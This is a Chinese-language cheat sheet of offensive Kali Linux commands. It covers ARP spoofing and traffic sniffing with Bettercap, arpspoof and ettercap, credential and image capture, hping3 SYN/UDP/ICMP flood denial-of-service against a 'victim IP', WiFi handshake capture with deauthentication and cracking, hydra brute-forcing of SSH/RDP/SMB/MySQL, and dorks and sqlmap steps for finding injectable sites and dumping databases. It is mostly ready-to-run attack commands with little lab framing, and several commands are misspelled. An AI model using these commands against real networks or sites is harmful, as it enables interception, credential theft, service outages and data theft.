Kali Linux 的基本工具使用以及sqlmap注入
使用之前请更新镜像源
内网工具集使用
Bettercap
Bettercap是一个功能强大的网络攻击工具,用于执行中间人攻击、ARP欺骗、DNS欺骗、SSL中间人攻击等。下面是使用Bettercap的基本步骤:
- 安装Bettercap:首先,您需要在Kali Linux上安装Bettercap。您可以使用以下命令进行安装:
sudo apt update
sudo apt install bettercap
- 启动Bettercap:安装完成后,您可以使用以下命令启动Bettercap:
sudo bettercap
-
选择接口:在Bettercap启动后,它将列出您系统上可用的网络接口。选择您要进行攻击的接口,例如Wi-Fi接口或以太网接口。
-
执行攻击:一旦选择了接口,您可以使用Bettercap的各种模块和命令执行不同的攻击。例如,您可以使用以下命令执行ARP欺骗攻击:
set arp.spoof.targets <目标IP>
arp.spoof on
这将启动ARP欺骗攻击,并将目标IP指定为您要攻击的目标。
- 监视流量:Bettercap还提供了监视网络流量的功能。您可以使用以下命令启动流量监视:
net.sniff on
捕获网卡中的http图片
Driftnet
Driftnet是一个用于捕获并展示网络中传输的图像的工具。它可以拦截网络流量中的图像文件,并将它们显示在屏幕上。以下是Driftnet的基本用法和一些常用参数:
-
基本用法:
driftnet
运行上述命令后,Driftnet将开始监听网络流量,并在屏幕上显示捕获到的图像。
-
指定捕获接口:
driftnet -i eth0
使用上述命令,您可以指定要监听的特定网络接口(例如eth0)。
-
指定图像保存目录:
driftnet -d /path/to/directory
使用上述命令,您可以指定Driftnet将捕获到的图像保存到指定的目录中。
-
显示图像尺寸信息:
driftnet -s
使用上述命令,Driftnet将在图像上显示其尺寸信息。
-
指定显示图像的窗口大小:
driftnet -x width -y height
使用上述命令,您可以指定Driftnet图像窗口的宽度和高度。
-
显示帮助信息:
driftnet -h
-
捕获账号密码
ettercap -Tq -i eth0
流量转发
开启流量转发
echo 1 > /proc/sys/net/ipv4/ip_forward
查看转发
cat /proc/sys/net/ipv4/ip_forward
arp欺骗
arping
"arping"是一个用于发送ARP请求的工具,用于检测网络中的主机是否在线。以下是"arping"的基本用法和一些常用参数:
-
基本用法:
arping <目标IP地址>
运行上述命令后,"arping"将发送ARP请求到指定的目标IP地址,并等待响应。
-
指定网络接口:
arping -I <网络接口> <目标IP地址>
使用上述命令,您可以指定要使用的网络接口。
-
指定源IP地址:
arping -s <源IP地址> <目标IP地址>
使用上述命令,您可以指定发送ARP请求时使用的源IP地址。
-
指定源MAC地址:
arping -S <源MAC地址> <目标IP地址>
使用上述命令,您可以指定发送ARP请求时使用的源MAC地址。
-
指定发送间隔时间:
arping -w <发送间隔时间> <目标IP地址>
使用上述命令,您可以指定发送ARP请求的间隔时间,以毫秒为单位。
-
显示详细信息:
arping -v <目标IP地址>
使用上述命令,"arping"将显示详细的输出信息,包括发送的ARP请求和接收到的响应。
-
显示帮助信息:
arping -h
arpspoof
arpspoof是一个常用的网络工具,用于执行ARP欺骗攻击。它可以欺骗目标主机,使其将网络流量发送给攻击者,从而实现中间人攻击。以下是arpspoof的基本用法和一些常用参数:
-
基本用法:
arpspoof -i <本地接口> -t <目标IP> <网关IP>
运行上述命令后,arpspoof将开始欺骗目标主机,使其将网络流量发送给攻击者。其中,
-i
参数用于指定本地接口,-t
参数用于指定目标主机的IP地址,<网关IP>
是指网络中的网关IP地址。 -
指定双向欺骗:
arpspoof -i <本地接口> -t <目标IP> -r <另一个目标IP> <网关IP>
使用上述命令,arpspoof将同时欺骗两个目标主机,使其将网络流量发送给攻击者。
-
指定特定的本地MAC地址:
arpspoof -i <本地接口> -t <目标IP> -m <本地MAC地址> <网关IP>
使用上述命令,您可以指定要发送的ARP响应中使用的本地MAC地址。
-
显示详细信息:
arpspoof -v -i <本地接口> -t <目标IP> <网关IP>
使用上述命令,arpspoof将显示详细的输出信息,包括发送的ARP响应和捕获的流量。
-
指定静默模式:
arpspoof -q -i <本地接口> -t <目标IP> <网关IP>
使用上述命令,arpspoof将在静默模式下运行,不显示任何输出信息。
-
显示帮助信息:
arpspoof -h
hping3以及压力测试
占满对方带宽不一定有效SYN攻击方式TCP
hping3 --flood -S --rand-source -p 端口 受害者IP
udp攻击无需对方建立连接不一定有效原理如上
hping3 --rand-source --udp -p 端口 --flood 受害者IP
icmp攻击方式但是最大数据只能1400
hping3 --flood --rand-source --icmp -d 1400 受害者ip
web测试压力 cc攻击模拟1000人并发
ab -n 数据数量 -c 并发多少人 网页链接
扫描类
收集域名信息
dig @dns
路由跟踪
traceroute
局域网ip扫描
netdiscover
WiFi类工具
aircrack-ng
开启监听模式
airmon-ng start wlan0
查看监听
airmon-ng
查看附近WiFi
airodump-ng wlan0mon
抓取握手包
airodump-ng -c 信道 --bssid 指定mac地址 -w 指定握手包保存位置 wlan0mon
强制断开重新连接获取握手包
aireplay-ng -0 攻击次数 -a 设备BSSID wlan0mon
开始跑包
aircarck-ng -a2 -b 目标设备BSSID -w 字典 /tmp/1
aireplay-ng -3 -b 目标BSSID -h 在链接的设备 wlan0mon desktop桌面
hydra九头蛇暴力破解密码类
l 指定单个用户名
-L指定单个用户名字典
-p指定单个密码
-P指定单个密码字典
-s 端口
-vV显示详细
-t 线程数默认16
-r 反向登录
-e nsr 参数
-n 没有密码的账户
-R 继续上一次破解
hybra -l administrator -P 密码字典目录 smb://目标ip -vV
sshliunx远程服务22
rdp远程服务3389
smb文件共享445
mysql数据库3306
sql注入类
inurl:asp?=id=1
inurl:php?=id=1
sqlmap -u 网站url
找到注入点
sqlmap -u 网页链接 --dbs
扫描到几个数据
sqlmap -u url -D 数据库名 --tables
扫描表
sqlmap -u url -D 数据库name -T 表名 --columns
扫描字段
qlmap -u url -D 数据库name -T 表名 -C 列名 --dump 1
sqlmap -u url -D 数据库name -T 表名 -C content --dump 2
show databases
查看所有数据库
order by
and 1=2 union select 1, version()
查询数据库版本
use dvwa
使用库
select database
()查看默认库
show tables
查看所有表
desc 表 查看表结构
show create table users\G
查看创建表sql语句
select user()
查看当前默认用户
select * from users\G;
以字段的方式查看所有users表
select * from information_schema.TABLES\G
select * from information_schema.COLUMNS\G
TABLE_SCHEMA 数据库名
TABLE_NMAE 表名
COLUMN_NAME 列名
distinct 过滤
sqlmap --batch -u 地址?id=1